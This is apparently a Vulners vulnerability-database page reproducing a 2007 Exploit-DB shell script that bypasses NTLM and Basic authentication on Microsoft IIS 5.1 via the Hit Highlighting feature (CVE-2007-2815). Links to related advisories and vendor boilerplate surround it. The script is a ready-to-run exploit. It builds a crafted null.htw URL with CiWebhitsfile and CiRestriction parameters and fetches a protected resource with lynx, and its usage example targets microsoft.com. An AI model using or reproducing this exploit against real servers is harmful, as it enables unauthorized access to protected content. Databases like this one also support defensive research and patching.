Lucene search
+L

Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass

🗓️ 31 May 2007 00:00:00Reported by Sha0Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 188 Views

Microsoft IIS 5.1 Hit Highlighting Authentication Bypas

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit
31 May 200700:00
zdt
checkpoint_advisories
Check Point Advisories
Microsoft IIS WebHits Authentication Bypass - Ver2 (CVE-2007-2815)
3 Mar 201400:00
checkpoint_advisories
cve
CVE
CVE-2007-2815
22 May 200719:00
cve
cvelist
Cvelist
CVE-2007-2815
22 May 200719:00
cvelist
exploitpack
exploitpack
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass
31 May 200700:00
exploitpack
nessus
Tenable Nessus
Microsoft IIS webhits.dll Hit-Highlighting Authentication Bypass
25 Mar 200800:00
nessus
nvd
NVD
CVE-2007-2815
22 May 200719:30
nvd
packetstorm
Packet Storm
CVE-2007-2815.txt
6 Jun 200700:00
packetstorm
prion
Prion
Authentication flaw
22 May 200719:30
prion
seebug
seebug.org
Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit
1 Jul 201400:00
seebug
Rows per page
#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: https://www.securityfocus.com/bid/24105/info   (CVE-2007-2815)

if [ $# != 2 ]
then
        printf "USAGE:\t\t$0 <Site> <Protected Object>\nExample:\t$0 http://www.microsoft.com  /en/us/default.aspx\n\n";
        exit 0
fi

site=$1
protectedObject=$2
evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
lynx -dump $evil

# milw0rm.com [2007-05-31]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 May 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.71905
188